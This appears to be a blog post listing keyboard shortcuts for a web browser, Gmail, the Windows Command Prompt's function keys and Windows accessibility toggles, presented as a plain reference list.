· Ctrl + F or F3: Open find toolbar.
· Ctrl + G or F3: Find next...
· Ctrl + Shift + G or Shift + F3: Find previous...
· Ctrl + B or Ctrl + I: Open Bookmarks sidebar.
· Ctrl + H: Open History sidebar.
· Escape: Stop loading page.
· Ctrl + R or F5: Reload current page.
· Ctrl + Shift + R or Ctrl + F5: Reload current page; bypass cache.
· Ctrl + U: View page source.
· Ctrl + D: Bookmark current page.
· Ctrl + NumpadPlus or Ctrl + Equals (+/=): Increase text size.
· Ctrl + NumpadMinus or Ctrl + Minus: Decrease text size.
· Ctrl + Numpad0 or Ctrl + 0: Set text size to default.
· Alt + Left or Backspace: Back.
· Alt + Right or Shift + Backspace: Forward.
· Alt + Home: Open home page.
· Ctrl + M: Open new message in integrated mail client.
· Ctrl + J: Open Downloads dialog.
· F6: Switch to next frame. You must have selected something on the page already, e.g. by use of Tab.
· Shift + F6: Switch to previous frame.
· Apostrophe ('): Find link as you type.
· Slash (/): Find text as you type.
Gmail Shortcuts
· Note: Must have "keyboard shortcuts" on in settings.
· C: Compose new message.
· Shift + C: Open new window to compose new message.
· Slash (/): Switch focus to search box.
· K: Switch focus to the next most recent email. Enter or "O" opens focused email.
· J: Switch focus to the next oldest email.
· N: Switch focus to the next message in the "conversation." Enter or "O" expands/collapses messages.
· P: Switch focus to the previous message.
· U: Takes you back to the inbox and checks for new mail.
· Y: Various actions depending on current view:
· Has no effect in "Sent" and "All Mail" views.
· Inbox: Archive email or message.
· Starred: Unstar email or message.
· Spam: Unmark as spam and move back to "Inbox."
· Trash: Move back to "Inbox."
· Any label: Remove the label.
· X: "Check" an email. Various actions can be performed against all checked emails.
· S: "Star" an email. Identical to the more familiar term, "flagging."
· R: Reply to the email.
· A: Reply to all recipients of the email.
· F: Forward an email.
· Shift + R: Reply to the email in a new window.
· Shift + A: Reply to all recipients of the email in a new window.
· Shift + F: Forward an email in a new window.
· Shift + 1 (!): Mark an email as spam and remove it from the inbox.
· G then I: Switch to "Inbox" view.
· G then S: Switch to "Starred" view.
· G then A: Switch to "All Mail" view.
· G then C: Switch to "Contacts" view.
· G then S: Switch to "Drafts" view.
List of F1-F9 Key Commands for the Command Prompt
· F1 / right arrow: Repeats the letters of the last command line, one by one.
· F2: Displays a dialog asking user to "enter the char to copy up to" of the last command line
· F3: Repeats the last command line
· F4: Displays a dialog asking user to "enter the char to delete up to" of the last command line
· F5: Goes back one command line
· F6: Enters the traditional CTRL+Z (^z)
· F7: Displays a menu with the command line history
· F8: Cycles back through previous command lines (beginning with most recent)
· F9: Displays a dialog asking user to enter a command number, where 0 is for first command line entered.
· Alt+Enter: toggle full Screen mode.
· up/down: scroll thru/repeat previous entries
· Esc: delete line
· Note: The buffer allows a maximum of 50 command lines. After this number is reached, the first line will be replaced in sequence.
Helpful accessibility keyboard shortcuts
· Switch FilterKeys on and off. Right SHIFT for eight seconds
· Switch High Contrast on and off. Left ALT +left SHIFT +PRINT SCREEN
· Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
· Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds
Subscrever:
Comentários (Atom)

